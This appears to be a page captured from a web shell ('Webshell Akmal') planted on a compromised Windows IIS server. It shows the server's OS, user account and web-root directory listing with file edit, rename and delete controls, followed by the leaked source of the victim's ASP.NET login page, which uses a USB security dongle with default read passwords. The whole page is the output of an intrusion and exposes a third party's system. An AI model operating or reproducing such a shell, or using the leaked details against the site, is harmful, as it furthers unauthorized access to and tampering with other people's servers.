Webshell Akmal archtte id
System:
Microsoft Windows NT 10.0.20348.0
Server:
Microsoft-IIS/10.0
User:
buyyou
Directory:
C:
\
MyData
\
WWW
\
asc365
\
Name
Size
Type
Actions
17Track
-
Directory
Rename
Delete
ASC365_CANADA
-
Directory
Rename
Delete
ASC365_Store01
-
Directory
Rename
Delete
aspnet_client
-
Directory
Rename
Delete
CompanyImage
-
Directory
Rename
Delete
TJGS_USA
-
Directory
Rename
Delete
zhijian
-
Directory
Rename
Delete
Memo.inc
0 bytes
.inc
Edit
Rename
Delete
web.config
213 bytes
.config
Edit
Rename
Delete
<%@ Page Language="C#" AutoEventWireup="true" CodeBehind="default.aspx.cs" Inherits="App._default" %> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title></title> <style type="text/css">body { margin: 0px; background-color: #cbe3fa; } .zt { font-size: 14px; color: #000000; font-style: normal } .zt1 { font-size: 12px; color: #3c65aa; font-style: normal } .zt2 { font-size: 12px; color: #0000ff; font-style: normal; text-decoration: underline } ld { color: #000000; text-decoration: none } ld:link { color: #000000; text-decoration: none } ld:visited { color: #000000; text-decoration: none } ld:hover { color: #000000; text-decoration: none } ld:active { color: #000000; text-decoration: none } .style9 { font-size: 14px; color: #000000; font-style: normal; height: 30px; } .style10 { height: 30px; } </style> <script> function refresh() { var url = "ValidateCode.aspx?id="; var r = Math.random() * 1000; url = url + r; document.all("Image1").src = url; document.all("LoI_txtVC").value = ""; document.all("LoI_txtVC").focus(); return false; } </script> <script src="ext/Syunew3.js" type="text/javascript"></script><!--加密狗UK单元包--> </head> <body> <br /><br /><br /><br /><br /> <form name="main" action="default.aspx" method="post" > <table cellspacing="0" cellpadding="0" align="center" width="661px" height="440px" background="ext/images/logon_bg.jpg" border="0"> <tr><td valign="middle" align="center"> <table height="300" cellspacing="0" cellpadding="0" border="0"> <tbody> <tr><td height="130px" ></td><td> <input type="hidden" size="14" name="flgYT88" value='<%=flgYT88 %>'/> <input type="hidden" size="14" name="clientenc" value='<%=clientenc %>'/> <input type="hidden" size="14" name="YT88ID" value='<%=YT88ID %>'/> </td></tr> <tr> <td class="style9" width="88" align="right" > 用户名称:</td> <td class="style10" ><input size="14" name="username" value='<%=user %>' onkeydown="chkReturn(event,this)"/></td> </tr> <tr> <td class="style9" width="88" align="right"> 用户密码:</td> <td class="style10" ><input type="password" size="14" name="password" value='<%=pass %>' onkeydown="chkReturn(event,this)" /></td> </tr> <tr> <td class="style9" width="88" align="right">验证码:</td> <td class="style10"> <input size="14" name="txtCheckCode" value='<%=txtCheckCode %>' onkeydown="chkReturn(event,this)" /> <asp:Image ID="Image1" runat="server" ImageUrl="ValidateCode.aspx" onclick="refresh(this, 'ValidateCode.aspx');"/> </td> </tr> <tr> <td colspan=2 align="center"> <a name='driver' href='USBKEY/SetUpAll.exe' target='_blank' style= "display : none ">请先安装加密狗驱动然后刷新页面</a> <br /><img onclick="CBETestYT88();" src="ext/images/dl.gif" width="84" height="26" border="0"/> <img onclick="exit();" src="ext/images/qx.gif" width="84" height="26" border="0"/> </td> </tr> </tbody></table> </td></tr></table> </form> <script type="text/javascript"> var bConnect=0; if (top.location !== self.location) { top.location = self.location; } self.moveTo(0, 0); self.resizeTo(screen.availWidth, screen.availHeight); window.onload = function () { if (document.main.password.value == '') document.main.username.focus(); load(); } function submit() { if (document.main.username.value == "") { self.alert("必须填写用户名"); document.main.username.focus(); return false; } if (document.main.password.value == "") { document.main.password.focus(); return false; } document.main.submit(); } function exit() { document.main.reset(); } function chkReturn(e,t) { var e=e || window.event; if (e.keyCode !=13) return ; if (t && t.name =='username') document.main.password.focus(); if (t && t.name =='password') document.main.txtCheckCode.focus(); if (t && t.name =='txtCheckCode') CBETestYT88(); } var rtn=<%=jsTxt %>; if (rtn.success) { if (rtn.messages) alert(rtn.messages); document.location.href='home.html'; }else { if (rtn.errors) alert(rtn.errors); } //检测密码 function load() { //如果是IE10及以下浏览器,则跳过不处理, if(navigator.userAgent.indexOf("MSIE")>0 && !navigator.userAgent.indexOf("opera") > -1) return; try { var s_pnp=new SoftKey3W(); s_pnp.Socket_UK.onopen = function() { bConnect=1;//代表已经连接,用于判断是否安装了客户端服务 } //在使用事件插拨时,注意,一定不要关掉Sockey,否则无法监测事件插拨 s_pnp.Socket_UK.onmessage =function got_packet(Msg) { /* var PnpData = JSON.parse(Msg.data); if(PnpData.type=="PnpEvent")//如果是插拨事件处理消息 { if(PnpData.IsIn) { alert("UKEY已被插入,被插入的锁的路径是:"+PnpData.DevicePath); } else { alert("UKEY已被拨出,被拨出的锁的路径是:"+PnpData.DevicePath); } }*/ } s_pnp.Socket_UK.onclose = function() { } } catch(e) { alert(e.name + ": " + e.message); return false; } } function CBETestYT88() { //如果是IE10及以下浏览器,则使用AVCTIVEX控件的方式 if(navigator.userAgent.indexOf("MSIE")>0 && !navigator.userAgent.indexOf("opera") > -1) return Handle_IE10(); //判断是否安装了服务程序,如果没有安装提示用户安装 if (bConnect == 0) //显示下载驱动 { window.alert ( "未能连接加密狗驱动程序,请确定加密狗驱动程序已经安装。"); var hhs = document.getElementsByTagName('a'); for (var hh=0; hh < hhs.length; hh++) { if (hhs[hh].style.display == 'none') { hhs[hh].style.display = 'inline'; } } return false; } else //隐藏下载驱动 { var hhs = document.main.getElementsByTagName('a'); for (var hh=0; hh < hhs.length; hh++) { if (hhs[hh].style.display != 'none') { hhs[hh].style.display = 'none'; } } } var DevicePath,ret,n,mylen,ID_1,ID_2,addr,DeviceID; try { //由于是使用事件消息的方式与服务程序进行通讯, //好处是不用安装插件,不分系统及版本,控件也不会被拦截,同时安装服务程序后,可以立即使用,不用重启浏览器 //不好的地方,就是但写代码会复杂一些 var s_simnew1=new SoftKey3W(); //创建UK类 s_simnew1.Socket_UK.onopen = function() { s_simnew1.ResetOrder();//这里调用ResetOrder将计数清零,这样,消息处理处就会收到0序号的消息,通过计数及序号的方式,从而生产流程 } //写代码时一定要注意,每调用我们的一个UKEY函数,就会生产一个计数,即增加一个序号,较好的逻辑是一个序号的消息处理中,只调用我们一个UKEY的函数 s_simnew1.Socket_UK.onmessage =function got_packet(Msg) { var UK_Data = JSON.parse(Msg.data); var mm = <%=rdn %>; if(UK_Data.type!="Process")return ;//如果不是流程处理消息,则跳过 switch(UK_Data.order) { case 0: { s_simnew1.FindPort(0);//发送命令取UK的路径 } break;//!!!!!重要提示,如果在调试中,发现代码不对,一定要注意,是不是少了break,这个少了是很常见的错误 case 1: { if( UK_Data.LastError!=0) { s_simnew1.Socket_UK.close(); document.main.flgYT88.value = "0";//标记上没有插入加密锁 submit(); //window.alert ( "未发现加密锁,请插入加密锁"); return false; } document.main.flgYT88.value = "1";//标记上已经插入加密锁 DevicePath=UK_Data.return_value;//获得返回的UK的路径 //获到设置在锁中的用户密码, //先从地址20读取字符串的长度,使用默认的读密码"FFFFFFFF","FFFFFFFF" addr=20; s_simnew1.YReadEx(addr,1,"ffffffff","ffffffff",DevicePath);//发送命令取UK地址20的数据 } break; case 2: { if( UK_Data.LastError!=0){ window.alert("读数据时错误,错误码为:"+UK_Data.LastError.toString());s_simnew1.Socket_UK.close();return false;} s_simnew1.GetBuf(0);//发送命令从数据缓冲区中数据 } break; case 3: { if( UK_Data.LastError!=0){ window.alert("调用GetBuf时错误,错误码为:"+UK_Data.LastError.toString());s_simnew1.Socket_UK.close();return false;} mylen=UK_Data.return_value;//获得返回的数据缓冲区中数据 //再从地址21读取相应的长度的字符串,,使用默认的读密码"FFFFFFFF","FFFFFFFF" addr=21; s_simnew1.YReadString(addr,mylen,"ffffffff", "ffffffff", DevicePath);//发送命令从UK地址21中取字符串 } break; case 4: { if( UK_Data.LastError!=0){ window.alert("读取字符串时错误,错误码为:"+UK_Data.LastError.toString());s_simnew1.Socket_UK.close();return false;} //frmlogin.Password.value=UK_Data.return_value;//获得返回的UK中地址21的字符串 //获取出厂ID s_simnew1.GetProduceDate(DevicePath); } break; case 5: { if( UK_Data.LastError!=0){ window.alert("读取字符串时错误,错误码为:"+UK_Data.LastError.toString());s_simnew1.Socket_UK.close();return false;} document.main.YT88ID.value=UK_Data.return_value;//获取出厂ID //这里返回对随机数的HASH结果 s_simnew1.EncString(mm.toString(),DevicePath);//发送命令让UK进行加密操作 } break; case 6: { if( UK_Data.LastError!=0){ window.alert("进行加密运行算时错误,错误码为:"+UK_Data.LastError.toString());s_simnew1.Socket_UK.close();return false;} document.main.clientenc.value =UK_Data.return_value;//获得返回的加密后的字符串 //所有工作处理完成后,关掉Socket s_simnew1.Socket_UK.close(); //!!!!!注意,这里一定要主动提交, submit(); } break; } } s_simnew1.Socket_UK.onclose = function(){ } return true; } catch (e) { alert(e.name + ": " + e.message); } } function Handle_IE10() { var DevicePath,ret,n,mylen; var mm = <%=rdn %>; try { //建立操作我们的锁的控件对象,用于操作我们的锁 var s_simnew1; //创建控件 s_simnew1=new ActiveXObject("Syunew3A.s_simnew3"); //查找是否存在锁,这里使用了FindPort函数 DevicePath = s_simnew1.FindPort(0); if( s_simnew1.LastError!= 0 ) { document.main.flgYT88.value = "0";//标记上没有插入加密锁 submit(); //window.alert ( "未发现加密锁,请插入加密锁"); return false; } document.main.flgYT88.value = "1";//标记上插入加密锁 //获到设置在锁中的用户密码, //先从地址20读取字符串的长度,使用默认的读密码"FFFFFFFF","FFFFFFFF" ret=s_simnew1.YReadEx(20,1,"ffffffff","ffffffff",DevicePath); mylen =s_simnew1.GetBuf(0); //再从地址21读取相应的长度的字符串,,使用默认的读密码"FFFFFFFF","FFFFFFFF" // frmlogin.Password.value=s_simnew1.YReadString(21,mylen,"ffffffff", "ffffffff", DevicePath); if( s_simnew1.LastError!= 0 ) { window.alert( "读取用户密码时错误,错误码为:"+s_simnew1.LastError.toString()); return false; } //获取出厂ID document.main.YT88ID.value=s_simnew1.GetProduceDate(DevicePath); //这里返回对随机数的HASH结果 document.main.clientenc.value=s_simnew1.EncString(mm.toString(),DevicePath); if( s_simnew1.LastError!= 0 ) { window.alert( "进行加密运行算时错误,错误码为:"+s_simnew1.LastError.toString()); return false; } //!!!!!注意,这里一定要主动提交, submit(); } catch (e) { alert(e.name + ": " + e.message+"。可能是没有安装相应的控件或插件"); var hhs = document.getElementsByTagName('a'); for (var hh=0; hh < hhs.length; hh++) { if (hhs[hh].style.display == 'none') { hhs[hh].style.display = 'inline'; } } } return true; } </script> </body> </html>